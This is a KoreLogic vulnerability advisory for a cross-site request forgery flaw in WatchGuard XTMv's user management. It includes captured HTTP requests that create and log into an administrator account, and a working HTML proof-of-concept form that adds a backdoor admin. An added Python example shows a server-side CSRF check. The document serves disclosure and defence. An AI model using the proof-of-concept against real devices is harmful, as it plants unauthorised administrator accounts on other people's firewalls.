<!--
KL-001-2017-004 : WatchGuard XTMv User Management Cross-Site Request Forgery

Title: WatchGuard XTMv User Management Cross-Site Request Forgery
Advisory ID: KL-001-2017-004
Publication Date: 2017.03.10
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2017-004.txt

1. Vulnerability Details

     Affected Vendor: WatchGuard
     Affected Product: XTMv
     Affected Version: v11.12 Build 516911
     Platform: Embedded Linux
     CWE Classification: CWE-352: Cross-Site Request Forgery (CSRF)
     Impact: Privileged Access
     Attack vector: HTTP

2. Vulnerability Description

     Lack of CSRF protection in the Add User functionality of the
     XTMv management portal can be leveraged to create arbitrary
     administrator-level accounts.

3. Technical Description

     As observed below, no CSRF token is in use when adding a new
     user to the management portal.

     POST /put_data/ HTTP/1.1
     Host: 1.3.3.7:8080
     Accept: */*
     Accept-Language: en-US,en;q=0.5
     Accept-Encoding: gzip, deflate, br
     Content-Type: application/json
     X-Requested-With: XMLHttpRequest
     Content-Length: 365
     Cookie: session_id=50f607247265897581a407bfb8b75e30d2b77287
     DNT: 1
     Connection: close

     {"__class__":"PageSystemManageAdminUsersObj","__module__":"modules.scripts.page.system.PageSystemManageAdminUsersObj","users":[],"add_entries":[{"__class__":"AdminUserObj","__module__":"modules.scripts.vo.AdminUserObj","name":"hacked","domain":"Firebox-DB","role":"Device Administrator","hash":"hacked","enabled":1,"rowindex":-1}],"upd_entries":[],"del_entries":[]}

     The HTTP response indicates that the changes were successful.

     HTTP/1.1 200 OK
     X-Frame-Options: SAMEORIGIN
     Content-Length: 68
     Expires: Sun, 28 Jan 2007 00:00:00 GMT
     Vary: Accept-Encoding
     Server: CherryPy/3.6.0
     Pragma: no-cache
     Cache-Control: no-cache, must-revalidate
     Date: Sat, 10 Dec 2016 18:08:22 GMT
     Content-Type: application/json
     Set-Cookie: session_id=50f607247265897581a407bfb8b75e30d2b77287; expires=Sat, 10 Dec 2016 19:08:22 GMT; httponly; Path=/; secure
     Connection: close

     {"status": true, "message": ["The changes were saved successfully"]}

     Now, the newly created backdoor account can be accessed.

     POST /agent/login HTTP/1.1
     Host: 1.3.3.7:8080
     Accept: application/xml, text/xml, */*; q=0.01
     Accept-Language: en-US,en;q=0.5
     Accept-Encoding: gzip, deflate, br
     Content-Type: text/xml
     X-Requested-With: XMLHttpRequest
     Content-Length: 414
     Cookie: sessionid=515F007C5BD062C2122008544DB127F80000000C; session_id=0a3d24668f5c3b2c7ba7016d179f5f574e1aaf53
     DNT: 1
     Connection: close

     <methodCall><methodName>login</methodName><params><param><value><struct><member><name>password</name><value><string>hacked</string></value></member><member><name>user</name><value><string>hacked</string></value></member><member><name>domain</name><value><string>Firebox-DB</string></value></member><member><name>uitype</name><value><string>2</string></value></member></struct></value></param></params></methodCall>

     The response below shows the application issuing an authenticated
     session cookie.

     HTTP/1.1 200 OK
     X-Frame-Options: SAMEORIGIN
     Content-type: text/xml
     Set-Cookie: sessionid=74B0DC5119495CFF2AE8944A625558EC00000008;secure;HttpOnly
     Connection: close
     Date: Sat, 10 Dec 2016 19:55:26 GMT
     Server: none
     Content-Length: 751

     <?xml version="1.0"?>
     <methodResponse>
     <params>
     <param>
     <value>
     <struct>
     <member><name>sid</name><value>74B0DC5119495CFF2AE8944A625558EC00000008</value></member>
     <member><name>response</name><value></value></member>
     <member>
     <name>readwrite</name>
     <value><struct>
     <member><name>privilege</name><value>2</value></member>
     <member><name>peer_sid</name><value>0</value></member>
     <member><name>peer_name</name><value>error</value></member>
     <member><name>peer_ip</name><value>0.0.0.0</value></member>
     </struct></value>
     </member>
     </struct>
     </value>
     </param>
     </params>
     </methodResponse>

4. Mitigation and Remediation Recommendation

     The vendor has remediated this vulnerability in WatchGuard
     XTMv v11.12.1. Release notes and upgrade instructions are
     available at:

     https://www.watchguard.com/support/release-notes/fireware/11/en-US/EN_ReleaseNotes_Fireware_11_12_1/index.html

5. Credit

     This vulnerability was discovered by Matt Bergin (@thatguylevel)
     of KoreLogic, Inc. and Joshua Hardin.

6. Disclosure Timeline

     2017.01.13 - KoreLogic sends vulnerability report and PoC to WatchGuard.
     2017.01.13 - WatchGuard acknowledges receipt of report.
     2017.01.23 - WatchGuard informs KoreLogic that the vulnerability will be
                  addressed in the forthcoming v11.12.1 firmware, scheduled for
                  general availability on or around 2017.02.21.
     2017.02.22 - WatchGuard releases v11.12.1.
     2017.03.10 - KoreLogic public disclosure.

7. Proof of Concept
-->

<html>
<body>
<form action="https://1.3.3.7:8080/put_data/" method="POST" enctype="text/plain">
<input type="hidden" name="{"__class__":"PageSystemManageAdminUsersObj","__module__":"modules.scripts.page.system.PageSystemManageAdminUsersObj","users":[],"add_entries":[{"__class__":"AdminUserObj","__module__":"modules.scripts.vo.AdminUserObj","name":"hacked3","domain":"Firebox-DB","role":"Device Administrator","hash":"hacked3","enabled":1,"rowindex":-1}],"upd_entries":[],"del_entries":[]}" value="" />
<input type="submit" value="Trigger" />
</form>
</body>
</html>

<!--
The contents of this advisory are copyright(c) 2017 KoreLogic, Inc.
and are licensed under a Creative Commons Attribution Share-Alike 4.0
(United States) License: http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a proven
track record of providing security services to entities ranging from
Fortune 500 to small and mid-sized companies. We are a highly skilled
team of senior security consultants doing by-hand security assessments
for the most important networks in the U.S. and around the world. We
are also developers of various tools and resources aimed at helping the
security community.

https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at:
https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt
-->
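The following is an added defensive example, not code from the advisory, from KoreLogic or from WatchGuard. It shows the server-side gate that would have rejected the text/plain form submission in section 7 while still admitting the legitimate request from section 3: a strict Content-Type check, the X-Requested-With marker, an Origin/Referer allow-list, and a per-session synchronizer token. The session store, the X-CSRF-Token header name and the allowed origin are assumptions for illustration.

```python
"""Request gate for a JSON admin endpoint such as /put_data/ (added example)."""
import hmac
import secrets
from urllib.parse import urlparse

# Management host taken from the advisory's captures; assumed as the sole origin.
ALLOWED_ORIGINS = {"https://1.3.3.7:8080"}


def issue_csrf_token(session: dict) -> str:
    """Mint a per-session synchronizer token (hypothetical dict-based session store)."""
    session["csrf_token"] = secrets.token_hex(32)
    return session["csrf_token"]


def csrf_check(headers: dict, session: dict) -> tuple:
    """Return (allowed, reason) for a state-changing request, given its headers."""
    h = {k.lower(): v for k, v in headers.items()}

    # 1. An HTML form can only produce urlencoded, multipart or text/plain bodies.
    #    The real client sends application/json, so anything else is rejected
    #    before the body is even parsed.
    ctype = h.get("content-type", "").split(";")[0].strip().lower()
    if ctype != "application/json":
        return False, "unexpected content type %r" % ctype

    # 2. A cross-site form cannot set custom headers without a CORS preflight,
    #    so the marker header the portal's own JavaScript sends must be present.
    if h.get("x-requested-with") != "XMLHttpRequest":
        return False, "missing X-Requested-With"

    # 3. Origin (Referer as fallback) must name the management host.
    src = h.get("origin") or h.get("referer")
    if not src:
        return False, "no Origin or Referer header"
    p = urlparse(src)
    if "%s://%s" % (p.scheme, p.netloc) not in ALLOWED_ORIGINS:
        return False, "origin %r not allowed" % src

    # 4. Synchronizer token bound to the session; compare in constant time.
    expected = session.get("csrf_token", "")
    supplied = h.get("x-csrf-token", "")
    if not expected or not hmac.compare_digest(expected, supplied):
        return False, "bad CSRF token"
    return True, "ok"
```

Checks 1 and 2 alone are only as strong as the device's CORS policy; the token in check 4 is the control that does not depend on browser behaviour.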